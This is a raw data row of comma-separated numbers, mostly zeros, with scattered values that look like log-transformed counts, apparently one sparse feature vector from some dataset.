0.0, 4.06534854782536, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 13.660472509367466, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 3.7369991058576035, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.3978952727983707, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.70805020110221, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 7.973471367577775, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 3.2188758248682006, 0, 3.8005740880419454, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.8005740880419454, 0.0, 5.723585101952381, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 6.437751649736401, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 3.1354942159291497, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.2188758248682006, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 4.160336650881089, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.101797476893978, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 11.76620976334845, 0.0, 0.0, 0.0, 0, 0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0, 10.559023657635953, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.008260801089284, 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 2.6390573296152584, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.877735781779639, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196, 3.4339872044851467, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 2.833213344056216, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 3.649511027115099, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 4.06534854782536, 0.0, 5.545177444479562, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 